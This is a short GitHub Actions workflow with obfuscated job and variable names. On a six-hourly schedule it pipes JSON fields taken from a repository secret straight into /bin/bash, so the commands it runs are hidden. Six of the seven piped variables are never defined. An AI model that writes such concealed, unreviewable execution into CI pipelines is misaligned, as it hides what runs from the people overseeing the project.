name: anzaidong1887
on:
  workflow_dispatch:
  schedule:
    - cron: '47 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: anzaidong1887
        env:
          a0: ${{ secrets.a0 }}
        run: |
          echo $a0 | jq -r .dd96419 | /bin/bash
          echo $qgg0757 | jq -r .zxk399 | /bin/bash
          echo $u01 | jq -r .x39 | /bin/bash
          echo $zphwf8 | jq -r .qdcf4 | /bin/bash
          echo $cq614 | jq -r .efjh9068 | /bin/bash
          echo $j1294 | jq -r .xexj5 | /bin/bash
          echo $lspy8 | jq -r .nqsc35695 | /bin/bash

